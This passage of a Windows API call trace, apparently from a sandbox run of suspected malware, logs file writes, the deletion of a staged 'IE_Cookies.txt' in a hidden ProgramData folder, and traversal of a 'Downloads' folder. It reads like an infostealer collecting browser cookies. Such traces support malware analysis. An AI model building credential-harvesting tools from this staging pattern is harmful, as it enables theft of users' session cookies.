nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.411] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x17, lpOverlapped=0x0) returned 1 [0116.412] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.412] GetDesktopWindow () returned 0x10010 [0116.412] GetTickCount () returned 0x123096e [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.412] SetLastError (dwErrCode=0x0) [0116.412] GetLastError () returned 0x0 [0116.413] SetLastError (dwErrCode=0x0) [0116.413] GetLastError () returned 0x0 [0116.413] SetLastError (dwErrCode=0x0) [0116.413] GetLastError () returned 0x0 [0116.413] SetLastError (dwErrCode=0x0) [0116.413] ReadFile (in: hFile=0x564, lpBuffer=0x390a998, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x390a998*, lpNumberOfBytesRead=0x19deb8*=0x0, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x38eba1c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19de84, lpOverlapped=0x0 | out: lpBuffer=0x38eba1c*, lpNumberOfBytesWritten=0x19de84*=0x2, lpOverlapped=0x0) returned 1 [0116.413] CloseHandle (hObject=0x564) returned 1 [0116.413] SetFilePointer (in: hFile=0x358, lDistanceToMove=74, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.413] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.414] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.415] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19e074*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e074*, lpNumberOfBytesWritten=0x19ded0*=0x17, lpOverlapped=0x0) returned 1 [0116.416] WriteFile (in: hFile=0x358, lpBuffer=0x19e28c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19e28c*, lpNumberOfBytesWritten=0x19ded0*=0x11, lpOverlapped=0x0) returned 1 [0116.416] SetFilePointer (in: hFile=0x358, lDistanceToMove=146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x92 [0116.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aab40 [0116.416] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x360) returned 0x29a79f8 [0116.416] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970510 | out: hHeap=0x29a0000) returned 1 [0116.416] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaec8 | out: hHeap=0x29a0000) returned 1 [0116.416] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700e0 | out: hHeap=0x29a0000) returned 1 [0116.416] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.417] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\IE_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\ie_cookies.txt")) returned 1 [0116.417] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eac08 | out: hHeap=0x29a0000) returned 1 [0116.417] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349bb859, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x349bb859, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x349bb859, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE_Cookies.txt", cAlternateFileName="IE_COO~1.TXT")) returned 0 [0116.417] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0116.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea418 [0116.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", cchWideChar=55, lpMultiByteStr=0x38ea418, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpUsedDefaultChar=0x0) returned 55 [0116.417] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0116.417] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea418 | out: hHeap=0x29a0000) returned 1 [0116.417] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a68c8 [0116.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a68c8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68c8 | out: hHeap=0x29a0000) returned 1 [0116.418] PathMatchSpecW (pszFile="Cookies", pszSpec="*.*") returned 1 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0116.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x37) returned 0x38ea658 [0116.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", cchWideChar=55, lpMultiByteStr=0x38ea658, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpUsedDefaultChar=0x0) returned 55 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea658 | out: hHeap=0x29a0000) returned 1 [0116.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.418] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aabe8 [0116.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies", cchWideChar=9, lpMultiByteStr=0x29aabe8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Cookies", lpUsedDefaultChar=0x0) returned 9 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0116.418] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.418] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies")) returned 0 [0116.418] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0116.418] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34783edf, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34783edf, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34783edf, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0116.418] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.418] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.419] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Downloads" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" [0116.419] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.419] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.419] lstrcatW (in: lpString1="\\", lpString2="Downloads" | out: lpString1="\\Downloads") returned="\\Downloads" [0116.419] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0116.419] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0116.419] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" [0116.419] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\*.*" [0116.419] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34783edf, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34783edf, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34783edf, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437a0 [0116.419] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" [0116.419] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\" [0116.419] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\." [0116.419] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Downloads" | out: lpString1="\\Downloads") returned="\\Downloads" [0116.419] lstrcatW (in: lpString1="\\Downloads", lpString2="\\" | out: lpString1="\\Downloads\\") returned="\\Downloads\\" [0116.419] lstrcatW (in: lpString1="\\Downloads\\", lpString2="." | out: lpString1="\\Downloads\\.") returned="\\Downloads\\." [0116.419] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.419] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34783edf, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34783edf, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34783edf, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.420] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" [0116.420] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\" [0116.420] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads\\.." [0116.420] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Downloads" | out: lpString1="\\Downloads") returned="\\Downloads" [0116.420] lstrcatW (in: lpString1="\\Downloads", lpString2="\\" | out: lpString1="\\Downloads\\") returned="\\Downloads\\" [0116.420] lstrcatW (in: lpString1="\\Downloads\\", lpString2=".." | out: lpString1="\\Downloads\\..") returned="\\Downloads\\.." [0116.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.420] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34783edf, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34783edf, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, 